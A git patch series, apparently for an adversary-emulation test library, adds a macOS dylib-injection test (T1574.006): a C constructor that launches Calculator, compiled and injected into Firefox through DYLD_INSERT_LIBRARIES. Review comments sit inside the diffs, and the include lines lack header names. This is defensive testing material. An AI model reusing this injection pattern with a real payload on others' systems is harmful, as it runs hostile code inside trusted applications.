From 7748526bd441df9bdc69dd40e2d441ea1c1a1228 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Thu, 2 Jun 2022 14:56:00 -0500
Subject: [PATCH 1/4] C file for opening calc
---
 atomics/T1574.006/MacOS/T1574.006.c | 8 ++++++++
 1 file changed, 8 insertions(+)
 create mode 100644 atomics/T1574.006/MacOS/T1574.006.c
diff --git a/atomics/T1574.006/MacOS/T1574.006.c b/atomics/T1574.006/MacOS/T1574.006.c
new file mode 100644
index 00000000..7c2fedb2
--- /dev/null
+++ b/atomics/T1574.006/MacOS/T1574.006.c
@@ -0,0 +1,8 @@
+#include
+#include
+int system(const char *command);
+__attribute__((constructor))
+static void customConstructor(int argc, const char **argv)
+{
+system("open -a Calculator.app");
+}
From 3e36aa671fa9a20edee32c48c60ea5e9da804798 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Thu, 2 Jun 2022 14:57:35 -0500
Subject: [PATCH 2/4] MacOS Dylib injection for T1574.006 reference: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
---
 atomics/T1574.006/T1574.006.yaml | 33 ++++++++++++++++++++++++++++++++
 1 file changed, 33 insertions(+)
diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml
index 84641ebc..5f9d528d 100644
--- a/atomics/T1574.006/T1574.006.yaml
+++ b/atomics/T1574.006/T1574.006.yaml
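Review bot: The two `#include` lines at the top of the hunk carry no header name as shown here, so the file as displayed would not compile; if the names were lost in transit (likely `<stdlib.h>` among them, which declares system()), the hand-written prototype `int system(const char *command);` on the following line is redundant and should be dropped in favour of the include rather than duplicating a libc declaration. The `argc`/`argv` parameters of customConstructor are never read, and constructor-function arguments are a toolchain-specific extension, so the portable form is `static void customConstructor(void)`. The return value of `system()` is discarded, which is acceptable for a benign test payload, but the file deserves a one-line header comment stating that it exists only to demonstrate DYLD_INSERT_LIBRARIES loading for T1574.006 by launching Calculator.app, so that nobody later mistakes it for production code.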
@@ -62,3 +62,36 @@ atomic_tests:
 command: |
 LD_PRELOAD=#{path_to_shared_library} ls
 name: bash
+- name: Dylib Injection via DYLD_INSERT_LIBRARIES
+ description: |
+ injects a dylib that opens calculator via env variable
+ supported_platforms:
+ - macos
+ input_arguments:
+ file_to_inject:
+ description: Path of executable to be injected. Mostly works on non-apple default apps.
+ type: Path
+ default: /Applications/Firefox.app/Contents/MacOS/firefox
+ source_file:
+ description: Path of c source file
+ type: Path
+ default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
+ dylib_file:
+ description: Path of dylib file
+ type: Path
+ default: /tmp/T1574006MOS.dylib
+ dependency_executor_name: bash
+ dependencies:
+ - description: |
+ The c source must exist on disk at specified location (#{source_file})
+ prereq_command: |
+ if [ -f #{source_file} ]; then exit 0; else exit 1; fi;
+ get_prereq_command: |
+ gcc -dynamiclib #{source_file} -o #{dylib_file}
+ executor:
+ command: |
+ DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
+ cleanup_command: |
+ kill `pgrep Calculator`
+ name: bash
+ elevation_required: false
From df67a8aa4d96a7c937b07efefbb1cafda07eec62 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Fri, 3 Jun 2022 10:23:25 -0500
Subject: [PATCH 3/4] Fixed not compiling
---
 atomics/T1574.006/T1574.006.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/atomics/T1574.006/T1574.006.yaml b/atomics/T1574.006/T1574.006.yaml
index 5f9d528d..2d1f4c28 100644
--- a/atomics/T1574.006/T1574.006.yaml
+++ b/atomics/T1574.006/T1574.006.yaml
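Review bot: The cleanup_command line that passes the output of `pgrep Calculator` to `kill` errors out when no Calculator process exists, because kill is then invoked with no argument, and the cleanup never removes the compiled artifact at `#{dylib_file}`; `pkill -x Calculator` followed by `rm -f #{dylib_file}` handles both cases quietly. The executor launches `#{file_to_inject}` in the foreground, so the command presumably does not return until the target application exits — worth confirming on a runner before merging. The test description is also thinner than the file_to_inject hint (`Mostly works on non-apple default apps`) implies: it should state that targets with library validation or the hardened runtime ignore DYLD_INSERT_LIBRARIES, which is why a third-party app is the default, and that the observable for defenders is a process started with DYLD_INSERT_LIBRARIES in its environment pointing at an unsigned dylib.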
@@ -83,9 +83,9 @@ atomic_tests:
 dependency_executor_name: bash
 dependencies:
 - description: |
- The c source must exist on disk at specified location (#{source_file})
+ Compile the dylib from (#{source_file}). Destination is #{dylib_file}
 prereq_command: |
- if [ -f #{source_file} ]; then exit 0; else exit 1; fi;
+ gcc -dynamiclib #{source_file} -o #{dylib_file}
 get_prereq_command: |
 gcc -dynamiclib #{source_file} -o #{dylib_file}
 executor:
@@ -93,5 +93,6 @@ atomic_tests:
 DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
 cleanup_command: |
 kill `pgrep Calculator`
+ kill `pgrep firefox`
 name: bash
 elevation_required: false
From 40917c1a65493e70578559b247f71f86265907b2 Mon Sep 17 00:00:00 2001
From: Brendan Malone <46428809+RoundBunny@users.noreply.github.com>
Date: Tue, 7 Jun 2022 10:36:26 -0500
Subject: [PATCH 4/4] Moved c script
---
 atomics/T1574.006/{ => src}/MacOS/T1574.006.c | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename atomics/T1574.006/{ => src}/MacOS/T1574.006.c (100%)
diff --git a/atomics/T1574.006/MacOS/T1574.006.c b/atomics/T1574.006/src/MacOS/T1574.006.c
similarity index 100%
rename from atomics/T1574.006/MacOS/T1574.006.c
rename to atomics/T1574.006/src/MacOS/T1574.006.c
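Review bot: prereq_command is now the compile step itself (`gcc -dynamiclib #{source_file} -o #{dylib_file}`), identical to get_prereq_command, so the dependency check has a side effect, rebuilds on every run, and can no longer distinguish "dylib missing" from "compiler missing"; the check should test for the artifact the executor actually needs, `if [ -f #{dylib_file} ]; then exit 0; else exit 1; fi;`, and leave building to get_prereq_command. The rewritten description should then describe that condition rather than the build, for example `The compiled dylib must exist at #{dylib_file}`. The atomic test this hunk belongs to starts before and ends after the hunk.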
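Review bot: The added cleanup line that passes the output of `pgrep firefox` to `kill` is hard-coded to the default value of file_to_inject, so when an operator overrides that argument the launched process is never stopped, and when nothing matches kill fails with a usage error; it also matches any process containing "firefox", which would terminate an operator's unrelated browser session. Deriving the name from the argument, `pkill -x "$(basename #{file_to_inject})"`, keeps cleanup tied to what the executor started and exits quietly when there is nothing to kill. The same usage-error problem applies to the Calculator line just above it in the context.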